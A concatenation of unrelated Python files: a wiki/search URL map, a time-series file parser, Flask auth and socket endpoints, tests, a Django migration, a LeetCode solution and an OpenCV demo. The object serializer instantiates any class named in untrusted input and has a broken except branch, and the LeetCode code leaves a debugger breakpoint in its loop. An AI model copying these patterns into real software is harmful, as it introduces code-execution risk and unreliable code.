search_engine = { '나무위키': 'https://namu.wiki/w/', '리브레위키': 'https://librewiki.net/wiki/', '백괴사전': 'https://uncyclopedia.kr/wiki/', '위키백과': 'https://ko.wikipedia.org/wiki/', '진보위키': 'https://jinbowiki.org/wiki/index.php/', '구스위키': 'http://goos.wiki/index.php?title=', '구글': 'https://www.google.co.kr/search?q=', '네이버': 'https://search.naver.com/search.naver?query=', '스팀': 'http://store.steampowered.com/search/?term=' } direct_url = { '나무위키': 'https://namu.wiki/w/', '리브레위키': 'https://librewiki.net/wiki/', '백괴사전': 'https://uncyclopedia.kr/wiki/', '위키백과': 'https://ko.wikipedia.org/wiki/', '진보위키': 'https://jinbowiki.org/wiki/index.php/', '구스위키': 'http://goos.wiki/index.php', '구글': 'https://www.google.co.kr/', '네이버': 'https://search.naver.com/', '애니플러스': 'http://www.aniplustv.com', '트위터': 'https://twitter.com/', '페이스북': 'https://www.facebook.com/', '유튜브': 'https://www.youtube.com/', '구글플레이스토어': 'https://play.google.com/store', '애니맥스플러스': 'http://www.animaxplus.co.kr', '트위치': 'http://www.twitch.tv', '애스크FM': 'http://www.ask.fm', '배틀넷': 'http://www.blizzard.com/ko-kr/', '행아웃': 'https://hangouts.google.com', '텔레그램': 'https://web.telegram.org/', '디스코드': 'https://discordapp.com/', '스카이프': 'https://web.skype.com/', '파파고': 'https://papago.naver.com/', '구글번역기': 'https://translate.google.co.kr/?hl=ko', '텀블벅': 'https://tumblbug.com/', '킥스타터': 'https://www.kickstarter.com/', 'G마켓': 'http://www.gmarket.co.kr/‎', '옥션': 'http://www.auction.co.kr/', '에버노트': 'https://evernote.com/intl/ko', '픽시브': 'https://www.pixiv.net/?lang=ko', '알파위키': 'https://alphawiki.org' } hentai_url = { '히토미': 'https://hitomi.la', '익헨': 'https://e-hentai.org/' }
from datetime import datetime from distutils.util import strtobool import numpy as np import pandas as pd # Converts the contents in a .tsf file into a dataframe and returns # it along with other meta-data of the dataset: # frequency, horizon, whether the dataset contains missing values and whether the series have equal lengths # # Parameters # full_file_path_and_name - complete .tsf file path # replace_missing_vals_with - a term to indicate the missing values in series in the returning dataframe # value_column_name - Any name that is preferred to have as the name of the column containing series values in the returning dataframe def convert_tsf_to_dataframe( full_file_path_and_name, replace_missing_vals_with="NaN", value_column_name="series_value", ): col_names = [] col_types = [] all_data = {} line_count = 0 frequency = None forecast_horizon = None contain_missing_values = None contain_equal_length = None found_data_tag = False found_data_section = False started_reading_data_section = False with open(full_file_path_and_name, "r", encoding="cp1252") as file: for line in file: # Strip white space from start/end of line line = line.strip() if line: if line.startswith("@"): # Read meta-data if not line.startswith("@data"): line_content = line.split(" ") if line.startswith("@attribute"): if len(line_content) != 3: # Attributes have both name and type raise ValueError("Invalid meta-data specification.") col_names.append(line_content[1]) col_types.append(line_content[2]) else: if len(line_content) != 2: # Other meta-data have only values raise ValueError("Invalid meta-data specification.") if line.startswith("@frequency"): frequency = line_content[1] elif line.startswith("@horizon"): forecast_horizon = int(line_content[1]) elif line.startswith("@missing"): contain_missing_values = bool(strtobool(line_content[1])) elif line.startswith("@equallength"): contain_equal_length = bool(strtobool(line_content[1])) else: if len(col_names) == 0: raise ValueError("Missing attribute section. Attribute section must come before data.") found_data_tag = True elif not line.startswith("#"): if len(col_names) == 0: raise ValueError("Missing attribute section. Attribute section must come before data.") elif not found_data_tag: raise ValueError("Missing @data tag.") else: if not started_reading_data_section: started_reading_data_section = True found_data_section = True all_series = [] for col in col_names: all_data[col] = [] full_info = line.split(":") if len(full_info) != (len(col_names) + 1): raise ValueError("Missing attributes/values in series.") series = full_info[len(full_info) - 1] series = series.split(",") if len(series) == 0: raise ValueError( "A given series should contains a set of comma separated numeric values. At least one numeric value should be there in a series. Missing values should be indicated with ? symbol" ) numeric_series = [] for val in series: if val == "?": numeric_series.append(replace_missing_vals_with) else: numeric_series.append(float(val)) if numeric_series.count(replace_missing_vals_with) == len(numeric_series): raise ValueError( "All series values are missing. A given series should contains a set of comma separated numeric values. At least one numeric value should be there in a series." ) all_series.append(np.array(numeric_series, dtype=np.float32)) for i in range(len(col_names)): att_val = None if col_types[i] == "numeric": att_val = int(full_info[i]) elif col_types[i] == "string": att_val = str(full_info[i]) elif col_types[i] == "date": att_val = datetime.strptime(full_info[i], "%Y-%m-%d %H-%M-%S") else: raise ValueError( "Invalid attribute type." ) # Currently, the code supports only numeric, string and date types. Extend this as required. if att_val is None: raise ValueError("Invalid attribute value.") else: all_data[col_names[i]].append(att_val) line_count = line_count + 1 if line_count == 0: raise ValueError("Empty file.") if len(col_names) == 0: raise ValueError("Missing attribute section.") if not found_data_section: raise ValueError("Missing series information under data section.") all_data[value_column_name] = all_series loaded_data = pd.DataFrame(all_data) return ( loaded_data, frequency, forecast_horizon, contain_missing_values, contain_equal_length, ) def convert_multiple(text: str) -> str: if text.isnumeric(): return text if text == "half": return "0.5" def frequency_converter(freq: str): parts = freq.split("_") if len(parts) == 1: return BASE_FREQ_TO_PANDAS_OFFSET[parts[0]] if len(parts) == 2: return convert_multiple(parts[0]) + BASE_FREQ_TO_PANDAS_OFFSET[parts[1]] raise ValueError(f"Invalid frequency string {freq}.") BASE_FREQ_TO_PANDAS_OFFSET = { "seconds": "S", "minutely": "T", "minutes": "T", "hourly": "H", "hours": "H", "daily": "D", "days": "D", "weekly": "W", "weeks": "W", "monthly": "M", "months": "M", "quarterly": "Q", "quarters": "Q", "yearly": "Y", "years": "Y", } # Example of usage # loaded_data, frequency, forecast_horizon, contain_missing_values, contain_equal_length = convert_tsf_to_dataframe("TSForecasting/tsf_data/sample.tsf") # print(loaded_data) # print(frequency) # print(forecast_horizon) # print(contain_missing_values) # print(contain_equal_length)
from .baseserializer import BaseSerializer class ObjectSerializer(BaseSerializer): def __init__(self, obj_types, class_identifiers_in_params=False): super().__init__(obj_types, '^!Class\((([a-zA-Z_][0-9a-zA-Z_]*)\.([a-zA-Z_][0-9a-zA-Z_]*))?\)$') self.class_identifiers_in_params = class_identifiers_in_params def serialize(self, obj): if self.class_identifiers_in_params is True: result = { '!Class()': { '__module__': obj.__module__, '__class__': obj.__class__.__name__, **obj.__dict__ } } else: result = { '!Class({}.{})'.format(obj.__module__, obj.__class__.__name__, ): { **obj.__dict__ } } return result def deserialize(self, serialized_obj): # structure should be like this: { '!Object(Module.Class)': { ... params ... } } so only one item in the dict try: k, v = list(serialized_obj.items())[0] except: return obj import re r = re.match(self.id_regex, k) if not r: return serialized_obj if r.groups()[0] is None and '__class__' in v and '__module__' in v: module_name = v.pop("__module__") class_name = v.pop("__class__") elif r.groups()[0] is not None and r.groups()[1] is not None and r.groups()[2] is not None: module_name = r.groups()[1] class_name = r.groups()[2] module = __import__(module_name) cls = getattr(module, class_name) obj = cls(**v) return obj
from pypy.module.thread.test.support import GenericTestThread class AppTestLocal(GenericTestThread): def test_local_1(self): import thread from thread import _local as tlsobject freed = [] class X: def __del__(self): freed.append(1) ok = [] TLS1 = tlsobject() TLS2 = tlsobject() TLS1.aa = "hello" def f(i): success = False try: a = TLS1.aa = i b = TLS1.bbb = X() c = TLS2.cccc = i*3 d = TLS2.ddddd = X() self.busywait(0.05) assert TLS1.aa == a assert TLS1.bbb is b assert TLS2.cccc == c assert TLS2.ddddd is d success = True finally: ok.append(success) for i in range(20): thread.start_new_thread(f, (i,)) self.waitfor(lambda: len(ok) == 20, delay=3) assert ok == 20*[True] # see stdout/stderr for failures in the threads self.waitfor(lambda: len(freed) >= 40) assert len(freed) == 40 # in theory, all X objects should have been freed by now. Note that # Python's own thread._local objects suffer from the very same "bug" that # tls.py showed originally, and leaves len(freed)==38: the last thread's # __dict__ remains stored in the TLS1/TLS2 instances, although it is not # really accessible any more. assert TLS1.aa == "hello" def test_local_init(self): import thread tags = [1, 2, 3, 4, 5, 54321] seen = [] class X(thread._local): def __init__(self, n): assert n == 42 self.tag = tags.pop() x = X(42) assert x.tag == 54321 def f(): seen.append(x.tag) for i in range(5): thread.start_new_thread(f, ()) self.waitfor(lambda: len(seen) == 5, delay=2) seen1 = seen[:] seen1.sort() assert seen1 == [1, 2, 3, 4, 5] assert tags == [] def test_local_setdict(self): import thread x = thread._local() raises(TypeError, "x.__dict__ = 42") done = [] def f(n): x.spam = n assert x.__dict__["spam"] == n x.__dict__ = {"bar": n+1} assert x.bar == n+1 assert not hasattr(x, "spam") done.append(1) for i in range(5): thread.start_new_thread(f, (i,)) self.waitfor(lambda: len(done) == 5, delay=2) assert len(done) == 5
# -*- coding: utf-8 -*- from flask import Flask from flask_socketio import SocketIO from services import facial_recognition, brightness_detector, face_detector, object_detector, pose_estimation import configparser config = configparser.ConfigParser() config.read("secret.ini") app = Flask(__name__) PORT = config.get("APP", "PORT") DEBUG = config.get("APP", "DEBUG") == "True" app.config["SECRET_KEY"] = config.get("APP", "SECRET_KEY") socketio = SocketIO(app) @socketio.on("face verification") def face_verification(image1, image2): try: response = facial_recognition.facial_verification_for_auth( image1=image1, image2=image2 ) return response except: return False @socketio.on("brightness detector") def brightness_validator(image): try: response = brightness_detector.detect_brightness(image) return response except: return False @socketio.on("face detector") def face_detection(image): try: response = face_detector.face_detector(image) return response except: return False, "No face is detected" @socketio.on("object detector") def object_detection(image): try: # response = object_detector.object_detection(image) return False except: return False @socketio.on("pose detector") def pose_detection(image): try: response = pose_estimation.pose_estimation(image) print(response) return response except: return True, "" if __name__ == "__main__": socketio.run(app, debug=DEBUG, port=PORT)
# -*- coding: utf-8 -*- """Convenience visual methods""" import numpy as np import matplotlib.pyplot as plt def imshow(data, title=None, show=1, cmap=None, norm=None, complex=None, abs=0, w=None, h=None, ridge=0, ticks=1, yticks=None, aspect='auto', **kw): kw['interpolation'] = kw.get('interpolation', 'none') if norm is None: mx = np.max(np.abs(data)) vmin, vmax = ((-mx, mx) if not abs else (0, mx)) else: vmin, vmax = norm if cmap is None: cmap = 'bone' if abs else 'bwr' _kw = dict(vmin=vmin, vmax=vmax, cmap=cmap, aspect=aspect, **kw) if abs: plt.imshow(np.abs(data), **_kw) else: if (complex is None and np.sum(np.abs(np.imag(data))) < 1e-8) or ( complex is False): plt.imshow(data.real, **_kw) else: fig, axes = plt.subplots(1, 2) axes[0].imshow(data.real, **_kw) axes[0].imshow(data.imag, **_kw) plt.subplots_adjust(left=0, right=1, bottom=0, top=1, wspace=0, hspace=0) if w or h: plt.gcf().set_size_inches(14 * (w or 1), 8 * (h or 1)) if ridge: data_mx = np.where(np.abs(data) == np.abs(data).max(axis=0)) plt.scatter(data_mx[1], data_mx[0], color='r', s=4) if not ticks: plt.xticks([]) plt.yticks([]) if yticks is not None: idxs = np.linspace(0, len(yticks) - 1, 8).astype('int32') yt = ["%.2f" % h for h in yticks[idxs]] plt.yticks(idxs, yt) _maybe_title(title) if show: plt.show() def plot(x, y=None, title=None, show=0, ax_equal=False, complex=0, w=None, h=None, **kw): if y is None: y = x x = np.arange(len(x)) if complex: plt.plot(x, y.real, **kw) plt.plot(x, y.imag, **kw) else: plt.plot(x, y, **kw) _maybe_title(title) _scale_plot(plt.gcf(), plt.gca(), show=show, ax_equal=ax_equal, w=w, h=h) def scat(x, y=None, title=None, show=0, ax_equal=False, s=18, w=None, h=None, **kw): if y is None: y = x x = np.arange(len(x)) plt.scatter(x, y, s=s, **kw) _maybe_title(title) _scale_plot(plt.gcf(), plt.gca(), show=show, ax_equal=ax_equal, w=w, h=h) def hist(x, bins=500, title=None, show=0, stats=0): x = np.asarray(x) _ = plt.hist(x.ravel(), bins=bins) _maybe_title(title) if show: plt.show() if stats: mu, std, mn, mx = (x.mean(), x.std(), x.min(), x.max()) print("(mean, std, min, max) = ({}, {}, {}, {})".format( *_fmt(mu, std, mn, mx))) return mu, std, mn, mx def _fmt(*nums): return [(("%.3e" % n) if (abs(n) > 1e3 or abs(n) < 1e-3) else ("%.3f" % n)) for n in nums] def _maybe_title(title): if title is not None: plt.title(str(title), loc='left', weight='bold', fontsize=15) def _scale_plot(fig, ax, show=False, ax_equal=False, w=None, h=None): xmin, xmax = ax.get_xlim() rng = xmax - xmin ax.set_xlim(xmin + .018 * rng, xmax - .018 * rng) if w or h: fig.set_size_inches(14*(w or 1), 8*(h or 1)) if ax_equal: yabsmax = max(np.abs([*ax.get_ylim()])) mx = max(yabsmax, max(np.abs([xmin, xmax]))) ax.set_xlim(-mx, mx) ax.set_ylim(-mx, mx) fig.set_size_inches(8*(w or 1), 8*(h or 1)) if show: plt.show() def plotenergy(x, axis=1, **kw): plot(np.sum(np.abs(x) ** 2, axis=axis), **kw)
import sys import json sys.path.insert(0, '../osspeak') from recognition.rules import astree, _lark from recognition import lark_parser from recognition.lark_parser import utterance_grammar def utterance_from_text(text): lark_ir = utterance_grammar.parse(text) utterance_from_lark_ir = astree.utterance_from_lark_ir(lark_ir) return utterance_from_lark_ir def test_hello_world(): text = 'hello world' def test_top_level_grouping(): text = 'hello world | goodbye universe' def test_reference(): text = 'a number <digit>' def test_range(): text = 'hello_3-5' def test_fixed_repetition(): text = 'hello_3' def test_nested_grouping(): text = 'hello world | goodbye (universe | solar system)' def test_action_substitute2(): text = "question = how are you | fruit = i like apples" utterance = utterance_from_text(text) assert_equal(utterance, { "root": { "action_substitute": None, "repeat_high": 1, "repeat_low": 1, "sequences": [ [ { "action_substitute": { "type": "Literal", "value": "how are you" }, "repeat_high": 1, "repeat_low": 1, "text": "question", "type": "WordNode" }, ], [ { "action_substitute": { "type": "Literal", "value": "i like apples" }, "repeat_high": 1, "repeat_low": 1, "text": "fruit", "type": "WordNode" }, ] ], "type": "GroupingNode" }, "type": "Rule" }) def test_action_substitute(): text = "go to (google='http://google.com' | reddit='http://reddit.com')" utterance = utterance_from_text(text) assert_equal(utterance, { "root": { "action_substitute": None, "repeat_high": 1, "repeat_low": 1, "sequences": [ [ { "action_substitute": None, "repeat_high": 1, "repeat_low": 1, "text": "go", "type": "WordNode" }, { "action_substitute": None, "repeat_high": 1, "repeat_low": 1, "text": "to", "type": "WordNode" }, { "action_substitute": None, "repeat_high": 1, "repeat_low": 1, "sequences": [ [ { "action_substitute": { "type": "String", "value": "http://google.com" }, "repeat_high": 1, "repeat_low": 1, "text": "google", "type": "WordNode" } ], [ { "action_substitute": { "type": "String", "value": "http://reddit.com" }, "repeat_high": 1, "repeat_low": 1, "text": "reddit", "type": "WordNode" } ] ], "type": "GroupingNode" } ] ], "type": "GroupingNode" }, "type": "Rule" }) def pretty(d, indent=0): for key, value in d.items(): print('\t' * indent + str(key)) if isinstance(value, dict): pretty(value, indent+1) else: print('\t' * (indent+1) + str(value)) def utterance_from_text(text): lark_ir = lark_parser.parse_utterance(text) return astree.utterance_from_lark_ir(lark_ir) def to_clipboard(utterance): import recognition.actions.library.clipboard s = to_json_string(utterance) formatted = to_json_string(json.loads(s)) recognition.actions.library.clipboard.set(formatted.replace('null', 'None').replace('false', 'False').replace('true', 'True')) def to_json_string(node): return json.dumps(node, cls=SimpleJsonEncoder, sort_keys=True, indent=4) def assert_equal(utterance, json_value): assert json.loads(to_json_string(utterance)) == json_value class SimpleJsonEncoder(json.JSONEncoder): def default(self, o): d = o.__dict__.copy() d['type'] = o.__class__.__name__ return d
from . import PresenterBase # import releases # from entities import InvalidEntity products = { "Recommendation Services": "REPERIO", "Virtual/Mixed Reality": "KIWANO", "Content Similarity": "Search & Discovery" } class CockpitPresenter(PresenterBase): def __init__(self, columns, nice = lambda item: item, sort = [], placeholder = "n/a"): PresenterBase.__init__(self) self.available_columns = { "name": ("Specific Enabler", self.lookup_name), "avail-fi-ppp": ("availability for the FI-PPP partners", None), "avail-fi-lab": ("availability within FI-LAB", None), "avail-3rd-party": ("availability beyond the FI-PPP", None), "product": ("SE implementation product(s) name(s)", self.lookup_product), "owner": ("Owner", self.lookup_owners), "open-source": ("Open Source (Yes/No/Planned)", self.lookup_opensource), "mode": ("mode", self.lookup_mode), "last-update": ("date last update", None), "next-update": ("date next / 1st update", None), "assets": ("Baseline assets", self.lookup_assets), "catalog": ("Entry in Catalogue", self.lookup_catalog), "final-release": ("Final release", lambda se: self.lookup_release('08/15', se)), "roadmap": ("Roadmap", self.lookup_roadmap) } self.columns = [col for col in columns if col in self.available_columns] self.nice = nice self.placeholder = placeholder self.sort = [self.columns.index(col) for col in sort if col in self.columns] def lookup_release(self, rel, se): return 'X' if self.final_release.contains_se(se) else '' def lookup_product(self, se): id = se.get_name() if id in products: return products[id] return '-' def lookup_roadmap(self, se): nc = se.get_naming_conventions() if nc is None: return self.placeholder roadmap = nc.roadmap() if roadmap is None: return self.placeholder return roadmap # def lookup_availability(self, se): # return self.currentrelease.contains_se(se) def lookup_name(self, se): name = self.nice(se) if name is None: return self.placeholder return name def lookup_owners(self, se): owners = se.get('/spec/owners') if owners is None: return '[[UNKNOWN OWNER]]' return ', '.join(owners) def lookup_status(self, se): if self.final_release.contains_se(se): return 'available' status = se.get('/status') if status is None: return self.placeholder return status def lookup_assets(self, se): wiki = se.get('/auto/documentation/wiki-url') if wiki is None: return self.placeholder return wiki def lookup_catalog(self, se): # if not self.lookup_availability(se): # return 'not (yet) available' nc = se.get_naming_conventions() if nc is None: return self.placeholder return nc.catalogurl() def lookup_opensource(self, se): open = se.get('/auto/license/is-open-source') if open is None: return self.placeholder return open def lookup_mode(self, se): mode = [] if se.get('/auto/license/is-open-source') == 'Yes': template = se.get('/spec/license/template') mode.append('open source (%s)' % template) if se.get('/auto/delivery/hosted-service') == 'Yes': saas = 'SaaS' if se.get('/spec/delivery/instances/public') is not None: saas = 'Global SaaS instance' elif se.get('/spec/delivery/instances/fi-ppp') is not None: saas = 'Dedicated SaaS instance' mode.append(saas) binary = se.get('/spec/delivery/binary') if binary is not None: platforms = ', '.join(binary.keys()) mode.append('binaries (%s)' % platforms) if len(mode) == 0: return self.placeholder return ', '.join(mode) def present_col(self, se, colname): if colname not in self.available_columns: return self.placeholder col = self.available_columns[colname] f = col[1] if f is None: return self.placeholder v = f(se) if v is None: return self.placeholder return v def present_se(self, se): return [self.present_col(se, colname) for colname in self.columns] def present(self, meta): # self.currentrelease = meta.find_current_release() rels = meta.get_releases() self.final_release = rels[-1] self.rows = [self.present_se(se) for se in meta.get_specific_enablers()] if len(self.sort) > 0: self.rows.sort(key = lambda row: tuple([row[idx] for idx in self.sort])) def dump_row(self, out, row, sep = '|'): out.write((sep + ' %s ' + sep) % ((' ' + sep + ' ').join(row))) def dump(self, out): headings = [self.available_columns[colname][0] for colname in self.columns] self.dump_row(out, headings, '^') for row in self.rows: self.dump_row(out, row)
import jvcr from route_machine import Scene class TitleScene(Scene): def __init__(self) -> None: self.timer = 0 def on_activate(self): self.timer = 0 def update(self, dt) -> str: self.timer += dt jvcr.spr(0, 0, 0, 48*16, 256, 144, 0, 0, 0) if self.timer > 10: return "next" if self.timer > 0.5 and jvcr.btn(jvcr.BTN_B, 0): return "next"
# -*- coding: utf-8 -*- from werkzeug.datastructures import Headers from flask import ( current_app, jsonify, request, Blueprint, Response ) from flask_jwt_extended import ( create_access_token, create_refresh_token, current_user, get_csrf_token, jwt_refresh_token_required, jwt_required, set_refresh_cookies, set_access_cookies, unset_jwt_cookies, JWTManager ) from flask_restplus import Api, Resource from marshmallow import fields, Schema from app.models.usuario import UsuarioModel from app.models.revoked_token import RevokedTokenModel jwt = JWTManager() auth_bp = Blueprint('auth', __name__) # configura autenticacao # baseado no nome do usuario @jwt.user_identity_loader def user_identity_lookup(usuario): return usuario.usuario # obtem o objeto do atual usuario @jwt.user_loader_callback_loader def user_loader_callback(identity): return UsuarioModel.query.filter_by(usuario=identity).first() # trata mensagem de erro no acesso a um endpoint nao acessivel @jwt.user_loader_error_loader def custom_user_loader_error(identity): ret = { "message": "User {} not found".format(identity) } return jsonify(ret), 401 # verifica se o access/refresh token esta na blacklist @jwt.token_in_blacklist_loader def check_if_token_in_blacklist(decrypted_token): jti = decrypted_token['jti'] return RevokedTokenModel.is_jti_blacklisted(jti) auth = Api(auth_bp) class LoginSchema(Schema): usuario = fields.Str(required=True, min_length=6) senha = fields.Str(required=True) login_schema = LoginSchema() @auth.route('/login') class LoginResource(Resource): def post(self): args = login_schema.dump(request.form).data usuario = UsuarioModel.autenticate(args['usuario'], args['senha']) if usuario: # cria tokens access_token = create_access_token(usuario) refresh_token = create_refresh_token(usuario) # resposta com csrf's res = jsonify({ 'access_csrf': get_csrf_token(access_token), 'refresh_csrf': get_csrf_token(refresh_token) }) # Set the JWT cookies in the response set_access_cookies(res, access_token) set_refresh_cookies(res, refresh_token) return res else: return jsonify({'login': False}), 401 @auth.route('/fresh-login') class FreshLoginResource(Resource): def post(self): args = login_schema.dump(request.form) usuario = UsuarioModel.autenticate(args['usuario'], args['senha']) if usuario: access_token = create_access_token(usuario, fresh=True) res = jsonify({ 'access_csrf': get_csrf_token(access_token) }) set_access_cookies(res, access_token) return res else: return { 'error': 'Usuário ou Senha incorreto' }, 400 @auth.route('/logout') class LogoutResource(Resource): @jwt_required def post(self): res = jsonify({'logout': True}) unset_jwt_cookies(res) return res @auth.route('/refresh') class RefreshResource(Resource): @jwt_refresh_token_required def post(self): access_token = create_access_token(current_user) res = jsonify({ 'access_csrf': get_csrf_token(access_token) }) set_access_cookies(res, access_token) return res # encapsula registro do modulo def init_app(app): app.register_blueprint(auth_bp)
#!/usr/bin/env python3 import analyse import sys scores = analyse.load_scores() scores[0].to_csv(sys.argv[1]) scores[1].to_csv(sys.argv[2])
import os import pytest from ebonite.build.builder.base import use_local_installation from ebonite.client import Ebonite from tests.client.conftest import create_client_hooks # these imports are needed to ensure that these fixtures are available for use from tests.conftest import has_docker from tests.ext.test_s3.conftest import s3_artifact, s3server # noqa from tests.ext.test_sqlalchemy.test_postgres.conftest import postgres_meta, postgres_server # noqa @pytest.fixture def remote_ebnt(tmpdir, postgres_server, postgres_meta, s3server, s3_artifact): # noqa with use_local_installation(): # we reconstruct all objects here to ensure that config-related code is covered by tests ebnt = Ebonite.custom_client( metadata="sqlalchemy", meta_kwargs={ "db_uri": postgres_meta.db_uri }, artifact="s3", artifact_kwargs={ "bucket_name": s3_artifact.bucket_name, "endpoint": s3_artifact.endpoint, "region": s3_artifact.region }) cfg_path = os.path.join(tmpdir, 'config.json') ebnt.save_client_config(cfg_path) yield Ebonite.from_config_file(cfg_path) pytest_runtest_protocol, pytest_collect_file = create_client_hooks(remote_ebnt, 'remote') def pytest_collection_modifyitems(items, config): for colitem in items: if colitem.nodeid.startswith('tests/client/remote.py::'): colitem.add_marker(pytest.mark.docker) colitem.add_marker(pytest.mark.skipif(not has_docker(), reason='no docker installed'))
# Generated by Django 2.0.9 on 2019-07-19 21:10 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('movement', '0011_auto_20190521_1454'), ] operations = [ migrations.AlterModelOptions( name='movementbetweenofficerequest', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de Movimiento entre oficinas', 'verbose_name_plural': 'Requerimientos de Movimientos entre oficinas'}, ), migrations.AlterModelOptions( name='movementboxcolombia', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de la caja de Colombia', 'verbose_name_plural': 'Movimientos de la caja de Colombia'}, ), migrations.AlterModelOptions( name='movementdailysquare', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento del Cuadre Diario', 'verbose_name_plural': 'Movimientos del Cuadre Diario'}, ), migrations.AlterModelOptions( name='movementdonjuan', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de Don Juan', 'verbose_name_plural': 'Movimientos de Don Juan'}, ), migrations.AlterModelOptions( name='movementdonjuanusd', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de Don Juan', 'verbose_name_plural': 'Movimientos de Don Juan'}, ), migrations.AlterModelOptions( name='movementoffice', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de la oficina', 'verbose_name_plural': 'Movimientos de la oficina'}, ), migrations.AlterModelOptions( name='movementpartner', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento del socio', 'verbose_name_plural': 'Movimientos del socio'}, ), migrations.AlterModelOptions( name='movementprovisioning', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Movimiento de aprovisionamiento', 'verbose_name_plural': 'Movimientos de aprovisionamiento'}, ), migrations.AlterModelOptions( name='movementrequest', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de Movimiento', 'verbose_name_plural': 'Requerimientos de movimientos'}, ), migrations.AlterModelOptions( name='movementwithdraw', options={'ordering': ['-date', '-pk'], 'verbose_name': 'Requerimiento de retiro', 'verbose_name_plural': 'Requerimientos de retiro'}, ), migrations.AlterField( model_name='movementbetweenofficerequest', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementboxcolombia', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementdailysquare', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementdonjuan', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementdonjuanusd', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementoffice', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementpartner', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementprovisioning', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementrequest', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), migrations.AlterField( model_name='movementwithdraw', name='balance', field=models.IntegerField(default=0, verbose_name='Saldo a la fecha'), ), ]
class Solution: def arrayPairSum(self, nums): """ :type nums: List[int] :rtype: int """ # nums.sort() # max_sum = 0 # i = 0 # while (i<= len(nums)-1): # max_sum += nums[i] # i += 2 # return max_sum res = [0]*20001 for i in nums: res[i+10000]+=1 total, flag=0, 0 for idx, freq in enumerate(res): if freq: import pdb; pdb.set_trace() freq-=flag calc, flag = divmod(freq,2) total+=(calc+flag)*(idx-10000) return total abc = Solution() print (abc.arrayPairSum([1,4,3,2,5,6]))
#!/usr/bin/env python ''' ------------------------------------------------------------------------------------------ Copyright 2020 Romeo Dabok Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ------------------------------------------------------------------------------------------- Notes: This is just the sign in (or log in) script. Grabs the password an username from the forms, runs em through the the log in function and then sends a script to be executed depending on the result. ''' #import modules for CGI handling import cgi import theroom # Create instance of FieldStorage form = cgi.FieldStorage() gun = form.getvalue('uname') gpw = form.getvalue('pword') # Trys to sign up pros = theroom.logIn(gun,gpw) rpage = "" if (pros[0] == True): rpage = ''' isLoggedIn = true; setTimeout("changeRoom('lobby');",10); ''' #% (gun,gpw,pros[1]) #print(pros[2].output()) else: rpage = ''' var erp1 = document.getElementById('errorplace1'); var erp2 = document.getElementById('errorplace2'); erp1.innerHTML="Username or Password is incorrect"; erp2.innerHTML="Password or Username is incorrect"; ''' print("Content-Type: text/xml\r\n") print(rpage)
#!/usr/bin/env python3 # Contours, shape detection __author__ = "Cristian Chitiva" __date__ = "September 12, 2021" __email__ = "[email protected]" import cv2 import numpy as np def getContours(image): contours, Hierarchy = cv2.findContours(image, mode=cv2.RETR_EXTERNAL, method=cv2.CHAIN_APPROX_NONE) for cnt in contours: area = cv2.contourArea(cnt) print(area) if area > 500: cv2.drawContours(imgContour, contours=cnt, contourIdx=-1, color=(255,0,0), thickness=3) perimeter = cv2.arcLength(curve=cnt, closed=True) print(perimeter) approx = cv2.approxPolyDP(curve=cnt, epsilon=0.02*perimeter, closed=True) objCor = len(approx) x, y, width, height = cv2.boundingRect(approx) if objCor == 3: objType = 'Tri' elif objCor == 4: aspRatio = width/float(height) if aspRatio > 0.95 and aspRatio < 1.05: objType = 'Square' else: objType = 'Rect' elif objCor > 4: objType = 'Circle' else: objType = 'None' cv2.rectangle(imgContour, pt1=(x,y), pt2=(x+width,y+height), color=(0,255,0), thickness=2) cv2.putText(imgContour, text=objType, org=(x+width//2, y+height//2), fontFace=cv2.FONT_HERSHEY_COMPLEX, fontScale=0.5, color=(0,0,0), thickness=2) # IMAGES img = cv2.imread('resources/images/shapes.png') imgContour = img.copy() imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) imgBlur = cv2.GaussianBlur(imgGray, ksize=(7,7), sigmaX=1) imgCanny = cv2.Canny(imgBlur, threshold1=50, threshold2=50) getContours(imgCanny) cv2.imshow('Original',img) cv2.imshow('Gray',imgGray) cv2.imshow('Blur',imgBlur) cv2.imshow('Canny',imgCanny) cv2.imshow('Contours',imgContour) cv2.waitKey(0)
